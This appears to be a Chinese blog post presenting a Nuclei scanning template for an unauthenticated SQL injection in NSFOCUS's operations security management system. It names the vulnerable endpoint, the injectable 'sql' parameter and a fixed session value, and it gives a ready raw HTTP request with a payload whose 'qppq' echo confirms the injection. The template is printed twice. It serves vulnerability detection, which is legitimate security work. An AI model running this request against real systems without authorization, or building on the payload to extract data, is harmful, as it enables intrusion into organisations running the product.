绿盟运维安全管理系统SQL注入漏洞

### 解析要点

  • **漏洞名称**:绿盟运维安全管理系统SQL注入漏洞

  • **端点与方法**:GET /webconf/log/getDBType

  • **注入点**:`sql` 参数

  • **PoC关键参数**:`cat=espc`、`sid=7473a85e535405e7bd991cb82b2f134c`(假设为测试用固定值)

  • **响应证据**:执行注入后返回 `qppq`(由 `CHR(113)+CHR(112)+CHR(112)+CHR(113)` 生成)

  • **严重级别**:High(SQL注入无权限限制时默认High)

  • **参考链接**:用户提供的微信文章链接

### 最终YAML模板

复制代码
```yaml
id: nsfocus-ops-security-sqli-202512290956
info:
 name: 绿盟运维安全管理系统SQL注入漏洞
 author: auto-generator
 severity: High
 description: 绿盟运维安全管理系统存在SQL注入漏洞,攻击者可通过构造恶意GET请求注入SQL语句,获取敏感信息或执行任意操作。
 tags: [web, sqli, nsfocus, vulnerability]
 reference:
 - https://mp.weixin.qq.com/s/f_odVBl_8N7NCxXPQEIV-Q
 classification:
 cwe-id: CWE-89
 cve-id: ""
 cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
stop-at-first-match: true
http:
 - raw:
 - |
 GET /webconf/log/getDBType?cat=espc&sid=7473a85e535405e7bd991cb82b2f134c&sql=(SELECT+CHR(113)%257C%257CCHR(112)%257C%257CCHR(112)%257C%257CCHR(113)) HTTP/1.1
 Host: {{Hostname}}
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
 Accept: */*
 Connection: close
 matchers-condition: and
 matchers:
 - type: status
 status:
 - 200
 - type: word
 part: body
 words:
 - "qppq"
 case-insensitive: false
``` 

**说明**:

  1. 模板采用PoC原始请求复刻,保留关键参数 `sid` 和 `cat`;

  2. 注入payload生成 `qppq` 字符串作为响应证据;

  3. 若 `sid` 为临时值,需替换为实际有效sid或通过前置请求获取;

  4. 严重级别按无权限限制SQL注入默认设为High,可根据实际CVSS调整。

  5. 符合Nuclei 3.x规范,包含必要的matchers和stop机制。

  6. 严格遵循用户需求,仅输出最终YAML模板,无多余内容。

    yaml 复制代码
    id: nsfocus-ops-security-sqli-202512290956
    
    info:
    
      name: 绿盟运维安全管理系统SQL注入漏洞
    
      author: auto-generator
    
      severity: High
    
      description: 绿盟运维安全管理系统存在SQL注入漏洞,攻击者可通过构造恶意GET请求注入SQL语句,获取敏感信息或执行任意操作。
    
      tags: [web, sqli, nsfocus, vulnerability]
    
      reference:
    
        - https://mp.weixin.qq.com/s/f_odVBl_8N7NCxXPQEIV-Q
    
      classification:
    
        cwe-id: CWE-89
    
        cve-id: ""
    
        cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    
    stop-at-first-match: true
    
    http:
    
      - raw:
    
          - |
    
            GET /webconf/log/getDBType?cat=espc&sid=7473a85e535405e7bd991cb82b2f134c&sql=(SELECT+CHR(113)%257C%257CCHR(112)%257C%257CCHR(112)%257C%257CCHR(113)) HTTP/1.1
    
            Host: {{Hostname}}
    
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
    
            Accept: */*
    
            Connection: close
    
        matchers-condition: and
    
        matchers:
    
          - type: status
    
            status:
    
              - 200
    
          - type: word
    
            part: body
    
            words:
    
              - "qppq"
    
            case-insensitive: false
相关推荐
高梦轩30 分钟前
MySQL高可用
android·运维·数据库
孟章豪3 小时前
《SQL拼接 vs 参数化,为什么公司禁止拼接SQL?(附真实案例)》
服务器·数据库·sql
hsjcjh4 小时前
Nodemailer使用教程:在Node.js中发送电子邮件
linux·运维·node.js
没有梦想的咸鱼185-1037-16635 小时前
北斗高精度数据解算:破解城市峡谷/长基线/无网区难题,从毫米级定位到自动化交付——(GAMIT/GLOBK底层核心解算技术方法)
运维·arcgis·数据分析·自动化
不怕犯错,就怕不做5 小时前
linux 如何查看自己的帐号密码及samba的帐号和密码
linux·运维·服务器
实在智能RPA5 小时前
Agent 在物流行业能实现哪些自动化?——深度拆解 AI Agent 驱动的智慧物流新范式
运维·人工智能·ai·自动化
张3235 小时前
Linux 启动过程
linux·运维
李彦亮老师(本人)6 小时前
Rocky Linux 9.x 新特性详解
linux·运维·服务器·centos·rocky linux
kali-Myon7 小时前
CTFshow-Pwn142-Off-by-One(堆块重叠)
c语言·数据结构·安全·gdb·pwn·ctf·